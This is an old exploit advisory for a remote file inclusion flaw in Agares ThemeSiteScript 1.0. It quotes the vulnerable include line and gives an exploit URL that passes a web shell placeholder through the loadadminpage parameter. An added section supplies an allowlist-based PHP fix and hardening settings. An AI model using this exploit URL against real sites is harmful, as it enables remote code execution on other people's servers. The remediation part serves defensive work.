# Title : Agares ThemeSiteScript 1.0 (loadadminpage) RFI Vulnerability
# Published : 2008-10-28
# Author : DaRkLiFe
**************************************************************************************
Author : DaRkLiFe
Greetz : str0ke & S.W.A.T. & funkys0ul & Team 1nF3Ct3d
**************************************************************************************
Script :
ThemeSiteScript v1.0 Remote File Inclusion Vulnerability
Home Page :
http://agaresmedia.com
Download :
http://rapidshare.com/files/72501220/ThemeSiteScript_1.0_webgraf.ru.rar
**************************************************************************************
Exploit :
http://localhost/upload/admin/frontpage_right.php?loadadminpage=Sh3lLz?
**************************************************************************************
Vulnerable : admin/frontpage_right.php, line 2 : <?PHP include($loadadminpage); ?>
**************************************************************************************
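Fix (added example, not part of the original advisory and not the vendor's code): a hardened replacement for the include on line 2 that maps the loadadminpage value through a fixed allowlist, so request data never reaches include() as a path. The page keys and file paths are hypothetical, since the advisory does not list the script's real admin pages.

```php
<?php
// Added example: hardened replacement for line 2 of admin/frontpage_right.php.
// The page keys and file paths below are hypothetical placeholders.

// Fixed map from request value to a local file. Nothing supplied by the
// client is ever used as a path, so URLs, "../" sequences and stream
// wrappers cannot reach include().
const ADMIN_PAGES = [
    'themes'   => __DIR__ . '/pages/themes.php',
    'users'    => __DIR__ . '/pages/users.php',
    'settings' => __DIR__ . '/pages/settings.php',
];

/**
 * Resolve the loadadminpage parameter to an allowlisted file, or null.
 */
function resolve_admin_page($requested): ?string
{
    // Reject arrays (?loadadminpage[]=x) and anything that is not a short key.
    if (!is_string($requested) || !preg_match('/\A[a-z0-9_]{1,32}\z/', $requested)) {
        return null;
    }
    return ADMIN_PAGES[$requested] ?? null;
}

// Read the value explicitly from the query string instead of relying on
// register_globals to create $loadadminpage from request input.
$page = resolve_admin_page($_GET['loadadminpage'] ?? null);

if ($page === null || !is_file($page)) {
    http_response_code(404);
    exit('Unknown admin page');
}

include $page;
```

As defence in depth, keep allow_url_include = Off in php.ini and run a PHP version without register_globals (removed in PHP 5.4); the allowlist remains the actual fix because it also blocks local file inclusion.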
THANKS ! GREETZ ! HAPPY DIWALI !
**************************************************************************************
# www.Syue.com [2008-10-28]